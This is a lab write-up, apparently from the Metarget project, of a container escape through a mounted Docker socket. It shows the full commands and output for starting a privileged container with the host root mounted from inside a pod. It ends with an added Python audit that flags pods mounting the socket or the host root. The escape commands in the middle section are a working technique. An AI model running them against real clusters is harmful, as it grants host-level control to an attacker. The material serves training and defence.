【Scenario Type】
    Container escape - dangerous mount
    【Background】
    The Docker socket is the Unix domain socket that the Docker daemon listens on; it is used to talk to the daemon, either to query information or to issue commands. If this socket file (/var/run/docker.sock) is mounted inside a container that an attacker controls, the attacker can communicate with the Docker daemon through it, send a command that creates and runs a new container, mount the host's root directory into that new container, and complete a simple escape.
    【Environment Setup】
• Base environment preparation: any version of docker
    $ ./metarget gadget install docker --version 18.03.1
    $ ./metarget gadget install k8s --version 1.16.5 --domestic

    root@zyliang:~/metarget# ./metarget cnv install mount-docker-sock
    docker already installed
    kubernetes already installed
    mount-docker-sock is going to be installed
    applying yamls/k8s_metarget_namespace.yaml
    applying vulns_cn/mounts/pods/mount-docker-sock.yaml
    mount-docker-sock successfully installed
    root@zyliang:~/metarget# kubectl get pod -n metarget
    NAME READY STATUS RESTARTS AGE
    mount-docker-sock 1/1 Running 0 10s
• Install the docker command-line client
    # download the client and copy it into the container
    root@zyliang:~# wget https://download.docker.com/linux/static/stable/x86_64/docker-17.03.0-ce.tgz
    root@zyliang:~# docker ps | grep sock
    b425667a1be5 ba6acccedd29 "/bin/bash -c -- 'wh…" 4 minutes ago Up 4 minutes k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    1b7ccc8e47bc k8s.gcr.io/pause:3.1 "/pause" 4 minutes ago Up 4 minutes k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    root@zyliang:~# docker cp docker-17.03.0-ce.tgz b425667a1be5:/
    Successfully copied 27.8MB to b425667a1be5:/
    root@zyliang:~# kubectl exec -ti mount-docker-sock -n metarget bash
    root@mount-docker-sock:/# ls
    bin boot dev docker-17.03.0-ce.tgz etc home lib lib32 lib64 libx32 media mnt opt proc root run sbin srv sys tmp usr var
    root@mount-docker-sock:/# tar xf ./docker-17.03.0-ce.tgz
    root@mount-docker-sock:/# cd docker
    root@mount-docker-sock:/docker# ls
    docker docker-containerd docker-containerd-ctr docker-containerd-shim docker-init docker-proxy docker-runc dockerd
• Run docker ps inside the container to confirm docker.sock is mounted
    root@mount-docker-sock:/docker# ./docker ps
    CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
    b425667a1be5 ba6acccedd29 "/bin/bash -c -- '..." 7 minutes ago Up 7 minutes k8s_ubuntu_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    1b7ccc8e47bc k8s.gcr.io/pause:3.1 "/pause" 7 minutes ago Up 7 minutes k8s_POD_mount-docker-sock_metarget_52e21cfa-256f-4406-8840-709ed0218ed1_0
    1f21b8c613d5 ba6acccedd29 "/bin/bash -c -- '..." 4 hours ago Up 4 hours k8s_ubuntu_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
    eaa6db463eea k8s.gcr.io/pause:3.1 "/pause" 4 hours ago Up 4 hours k8s_POD_mount-host-procfs_metarget_0c64df69-a9b3-447e-8286-879b65849696_0
    336c2bef5a3f 5dd8f24429b4 "kube-controller-m..." 45 hours ago Up 45 hours k8s_kube-controller-manager_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_2
    ce01dda16af0 8d2e2e5a92ac "kube-scheduler --..." 45 hours ago Up 45 hours k8s_kube-scheduler_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_2
    81438fb18ba4 f03a23d55e57 "/opt/bin/flanneld..." 45 hours ago Up 46 hours k8s_kube-flannel_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
    879f271e40c5 70f311871ae1 "/coredns -conf /e..." 45 hours ago Up 46 hours k8s_coredns_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
    3f0fae5accd1 628f0e52ae53 "kube-apiserver --..." 45 hours ago Up 46 hours k8s_kube-apiserver_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
    8b3f58f3a00d 87a399dffea6 "/usr/local/bin/ku..." 45 hours ago Up 46 hours k8s_kube-proxy_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_1
    8e348df66d56 303ce5db0e90 "etcd --advertise-..." 45 hours ago Up 46 hours k8s_etcd_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
    f290e34beede 70f311871ae1 "/coredns -conf /e..." 45 hours ago Up 46 hours k8s_coredns_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
    b79655911a2c k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_coredns-6955765f44-52zz5_kube-system_1c963a32-3b26-48bd-91fc-1960c1eff89a_1
    2250007f5f66 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_kube-flannel-ds-kkpd9_kube-system_b82878a6-24fa-4c48-87ac-3b271537cc32_1
    f245faafd5f3 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_coredns-6955765f44-ng6wx_kube-system_c812523a-dba2-4c5f-ba63-64ef2e5c4568_1
    aaedfa1721d1 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_kube-apiserver-zyliang_kube-system_566bd1d164c57c0f50f380d21698033e_1
    6d4d5b451730 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_kube-proxy-kvzgk_kube-system_f9c78d1a-813b-4957-b9cc-0d420c5c254b_2
    2acaa76e2732 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_kube-scheduler-zyliang_kube-system_11d278345de05e1c5c61a63a8a1d78b2_1
    447554958f5b k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_etcd-zyliang_kube-system_98e5ca9d0b4f7e05e63d92dd34970ea9_1
    7179398f9453 k8s.gcr.io/pause:3.1 "/pause" 45 hours ago Up 46 hours k8s_POD_kube-controller-manager-zyliang_kube-system_10f23307b63ed7d3a0289ad0de3cac6e_1
    3a91b45e2ca5 dirtycowdockervdso_dirtycow "/bin/bash" 2 days ago Up 46 hours 1234/tcp dirtycowdockervdso_dirtycow_run_1
• From inside the container, start a privileged container that mounts the host's root directory, completing the escape
    root@mount-docker-sock:/docker# ./docker run -it -v /:/host --privileged --name=sock-test ubuntu /bin/bash
    root@08554a1cd523:/# ls /host/
    bin dev etc home initrd.img.old lib lost+found mnt proc run srv sys usr vmlinuz
    boot dirtycow-vdso evil initrd.img install lib64 media opt root sbin swapfile tmp var vmlinuz.old
    root@08554a1cd523:/# cat host/etc/hostname
    zyliang
    【References】
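The defensive counterpart to this scenario is finding pods that expose the Docker socket (or the host root) to a container before an attacker does. The audit below is an added example, not part of the Metarget writeup: it walks `kubectl get pods -A -o json` output and flags hostPath volumes that are actually mounted by a container. The pod JSON is constructed here to mirror the mount-docker-sock pod above; `find_dangerous_mounts` and `DANGEROUS_HOST_PATHS` are names chosen for this example.

```python
import json

# Constructed stand-in for `kubectl get pods -A -o json` (not real cluster data):
# one pod modelled on Metarget's mount-docker-sock, one benign pod for contrast.
SAMPLE_PODS_JSON = json.dumps({"items": [
    {"metadata": {"name": "mount-docker-sock", "namespace": "metarget"},
     "spec": {
         "volumes": [{"name": "sock", "hostPath": {"path": "/var/run/docker.sock"}}],
         "containers": [{"name": "ubuntu",
                         "volumeMounts": [{"name": "sock",
                                           "mountPath": "/var/run/docker.sock"}]}]}},
    {"metadata": {"name": "web", "namespace": "default"},
     "spec": {
         "volumes": [{"name": "cfg", "configMap": {"name": "web-cfg"}}],
         "containers": [{"name": "nginx",
                         "volumeMounts": [{"name": "cfg",
                                           "mountPath": "/etc/nginx/conf.d"}]}]}},
]})

# Host paths that give a container control of the container runtime or the host itself.
DANGEROUS_HOST_PATHS = ("/var/run/docker.sock", "/run/docker.sock", "/")


def find_dangerous_mounts(pods_json: str) -> list:
    """Return (namespace, pod, container, hostPath) for each container that mounts a
    hostPath volume whose source is one of DANGEROUS_HOST_PATHS."""
    findings = []
    for pod in json.loads(pods_json).get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        # volume name -> normalised host path, for hostPath volumes only
        host_paths = {v["name"]: (v["hostPath"]["path"].rstrip("/") or "/")
                      for v in spec.get("volumes", []) if "hostPath" in v}
        # an unmounted volume is harmless; only report volumes a container actually uses
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            for m in c.get("volumeMounts", []):
                path = host_paths.get(m["name"])
                if path in DANGEROUS_HOST_PATHS:
                    findings.append((meta.get("namespace"), meta.get("name"),
                                     c["name"], path))
    return findings


if __name__ == "__main__":
    for ns, pod, ctr, path in find_dangerous_mounts(SAMPLE_PODS_JSON):
        print("hostPath %s mounted by %s/%s (container %s)" % (path, ns, pod, ctr))
```

Pipe real output in with `kubectl get pods -A -o json | python3 audit.py` after replacing `SAMPLE_PODS_JSON` with `sys.stdin.read()`; pods that match should be treated as host-equivalent access and rejected by an admission policy rather than merely reported.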

    https://github.com/Metarget/metarget/tree/master/writeups_cnv/mount-docker-sock